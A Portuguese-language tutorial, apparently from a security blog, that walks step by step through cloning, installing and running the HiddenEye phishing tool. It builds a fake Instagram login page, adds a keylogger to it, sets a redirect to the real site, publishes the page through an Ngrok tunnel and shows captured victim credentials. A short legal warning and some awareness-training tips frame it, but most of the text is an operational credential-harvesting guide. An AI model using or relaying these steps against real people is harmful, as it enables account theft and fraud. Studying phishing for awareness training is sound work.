O Hidden Eye é uma plataforma de phishing que pode ser utilizada em um programa de conscientização sobre segurança da informação, porém também pode ser utilizada por pessoas mal intencionadas.

Projeto : github.com/DarkSecDevelopers/HiddenEye

Atenção

Como previsto na Lei 12.737/2012 no Art. 154-A. Invadir dispositivo informático alheio, conectado ou não à rede de computadores, mediante violação indevida de mecanismo de segurança e com o fim de obter, adulterar ou destruir dados ou informações sem autorização expressa ou tácita do titular do dispositivo ou instalar vulnerabilidades para obter vantagem ilícita:
Pena – detenção, de 3 (três) meses a 1 (um) ano, e multa.(Lei Nº 12.737, de 30 de novembro de 2012).

01 - Passo

Realize o download do Hidden Eye e liste o conteúdo do diretório:

Linux
git clone https://github.com/DarkSecDevelopers/HiddenEye

cd HiddenEye/

ls

02 - Passo

Realize a instalação dos pré-requisitos para o funcionamento do Hidden Eye.

Linux
pip3 install -r requirements.txt

03 - Passo

Atribua a permissão de execução no script HiddenEye.py.

Linux
chmod +x HiddenEye.py

04 - Passo

Execute o script HiddenEye.py.

Linux
./HiddenEye.py

Em seguida responda a pergunta: y = Sim, n = Não
Você concorda em usar essa ferramenta apenas para fins educacionais? (y / n)

HiddenEye >>> y

05 - Passo

Informe qual o modelo de phishing que você deseja utilizar.

Linux
HiddenEye >>>

06 - Passo

Para este exemplo optei em utilizar o modelo do [ 8 ] Instagram.

Linux
HiddenEye >>> 8

07 - Passo

Selecione um modo de operação.

Para este exemplo estou utilizando o modo padrão :

Linux
[ 1 ] Standard Instagram Web Page Phishing

HiddenEye >>> 1

08 - Passo

Você pode adicionar um Keylogger na página :

Linux
VOCÊ QUER ADICIONAR UM KEYLOGGER NA PÁGINA DE PHISHING – (Y/N)

YOUR CHOICE >>> Y

09 - Passo

Você deve informar um site para customizar o redirecionamento após a vítima inserir os dados.

Linux
REDIRECT HERE>>> www.instagram.com

10 - Passo

Seleciona um dos servidores disponíveis, Ngrok ou Serveo.

Linux
[1]Ngrok
[2]Serveo

HiddenEye >>> 1

11 - Passo

O servidor foi inciado e o endereço do phishing foi gerado:

Linux
https://5465aea9.ngrok.io

12 - Passo

Assim que o usuário acessa o link: https://5465aea9.ngrok.io ele visualiza uma página falsa do Instagram.

13 - Passo

Assim que a vítima preencher os campos do formulário os dados serão enviados para o atacante.

14 - Passo

Como definido no passo 09 após preencher o formulário de login a vítima é redirecionada para o site oficial do Instagram (www.instagram.com).

15 - Passo

Como pode ver os dados digitados no formulário são exibidos para o atacante.

Usuário : 100security
Senha : [email protected]

Dicas Úteis

  • Realize de forma periódica um trabalho de conscientização sobre segurança da informação com os usuários.
  • Crie um canal de comunicação para que os usuários possam reportar problemas e/ou e-mails suspeitos.
  • Publique dicas rápidas sobre segurança da informação na intranet da empresa.
  • Certifique-se que os filtros de internet estejam devidamente aplicados para impedir que um usuário de dentro da empresa possa ser vítima de um phishing.


  Autor

Marcos Henrique

 São Paulo/SP



  Coleta de Informações

© 2020 - 100SECURITY

Contato